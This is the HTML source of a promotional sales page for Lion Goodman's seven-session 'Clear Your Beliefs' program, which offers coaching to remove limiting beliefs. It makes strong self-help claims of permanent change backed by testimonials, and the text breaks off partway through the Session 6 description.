href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 